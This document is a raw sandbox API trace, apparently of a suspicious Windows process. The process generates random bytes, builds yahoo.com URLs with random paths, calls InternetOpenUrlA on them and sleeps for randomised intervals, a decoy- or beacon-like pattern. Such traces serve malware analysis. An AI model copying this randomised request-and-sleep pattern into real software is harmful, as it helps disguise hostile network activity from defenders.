0x7ffc5bcc36b0 [0232.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0232.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0232.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.963] GetProcessHeap () returned 0x440000 [0232.963] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0232.963] lstrcpyA (in: lpString1=0x472f30, lpString2="ÿ±J»s://www.yahoo.com" | out: lpString1="ÿ±J»s://www.yahoo.com") returned="ÿ±J»s://www.yahoo.com" [0232.963] lstrcatA (in: lpString1="ÿ±J»s://www.yahoo.com", lpString2="/lwf41ov1ulo10Kahakx8kt0dhmtVplNXWg6Etefelr4v/" | out: lpString1="ÿ±J»s://www.yahoo.com/lwf41ov1ulo10Kahakx8kt0dhmtVplNXWg6Etefelr4v/") returned="ÿ±J»s://www.yahoo.com/lwf41ov1ulo10Kahakx8kt0dhmtVplNXWg6Etefelr4v/" [0232.964] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0232.964] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ÿ±J»s://www.yahoo.com/lwf41ov1ulo10Kahakx8kt0dhmtVplNXWg6Etefelr4v/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0232.964] GetProcessHeap () returned 0x440000 [0232.964] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0232.964] GetProcessHeap () returned 0x440000 [0232.964] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5870 | out: hHeap=0x440000) returned 1 [0232.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0232.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0232.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0232.966] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0232.966] Sleep (dwMilliseconds=0x13698) [0233.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0233.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0233.557] GetProcessHeap () returned 0x440000 [0233.557] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5970 [0233.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0233.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5971, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4f5971) returned 0x0 [0233.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0233.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0233.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0233.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0233.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0233.793] GetProcessHeap () returned 0x440000 [0233.793] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0233.794] lstrcpyA (in: lpString1=0x473b90, lpString2="pYO" | out: lpString1="pYO") returned="pYO" [0233.794] lstrcatA (in: lpString1="pYO", lpString2="/g8gxeq9drqwefzv1vT6gxU/" | out: lpString1="pYO/g8gxeq9drqwefzv1vT6gxU/") returned="pYO/g8gxeq9drqwefzv1vT6gxU/" [0233.794] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0233.794] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="pYO/g8gxeq9drqwefzv1vT6gxU/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0233.802] GetProcessHeap () returned 0x440000 [0233.802] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0233.802] GetProcessHeap () returned 0x440000 [0233.802] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5970 | out: hHeap=0x440000) returned 1 [0233.803] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0233.803] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0233.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0233.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0233.804] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0233.804] Sleep (dwMilliseconds=0x115d4) [0234.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0234.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0234.828] GetProcessHeap () returned 0x440000 [0234.828] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0234.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0234.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0234.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0234.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0234.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0234.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0234.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0234.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0234.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b268, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a1b268) returned 0x0 [0234.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0234.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0234.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0234.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0234.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0234.838] GetProcessHeap () returned 0x440000 [0234.838] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0234.838] lstrcpyA (in: lpString1=0x472b10, lpString2="m®\x10¾s://www.yahoo.com" | out: lpString1="m®\x10¾s://www.yahoo.com") returned="m®\x10¾s://www.yahoo.com" [0234.838] lstrcatA (in: lpString1="m®\x10¾s://www.yahoo.com", lpString2="/0nZwf22hPq5bHKjm96jcgb/vkny2opbzR1kcdxZa4h/" | out: lpString1="m®\x10¾s://www.yahoo.com/0nZwf22hPq5bHKjm96jcgb/vkny2opbzR1kcdxZa4h/") returned="m®\x10¾s://www.yahoo.com/0nZwf22hPq5bHKjm96jcgb/vkny2opbzR1kcdxZa4h/" [0234.838] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0234.838] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="m®\x10¾s://www.yahoo.com/0nZwf22hPq5bHKjm96jcgb/vkny2opbzR1kcdxZa4h/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0234.839] GetProcessHeap () returned 0x440000 [0234.839] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0234.839] GetProcessHeap () returned 0x440000 [0234.839] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0234.840] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0234.840] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0234.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0234.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0234.841] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0234.841] Sleep (dwMilliseconds=0x16674) [0235.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 